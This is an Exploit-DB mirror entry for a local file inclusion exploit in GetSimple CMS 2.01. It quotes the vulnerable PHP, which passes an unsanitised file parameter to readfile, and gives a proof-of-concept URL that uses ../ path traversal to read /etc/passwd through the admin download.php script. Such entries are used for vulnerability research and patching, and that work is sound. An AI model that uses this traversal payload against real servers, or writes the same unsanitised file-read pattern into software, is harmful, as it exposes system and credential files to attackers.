exploit-db-mirror/exploits/php/webapps/12517.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
395 B
Text

# Exploit Title: GetSimple 2.01 LFI
# Date: 4/5/2010
# Author: Batch
# Software Link: http://www.box.net/get-simple
# Version: 2.01
#Special Conditions: Must be admin.
# Code :
...
# get file
if (file_exists($_GET['file'])) {
readfile($_GET['file'], 'r');
}
exit;
...
http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd
#-Batch
#ryan1918.com
#Everyone else.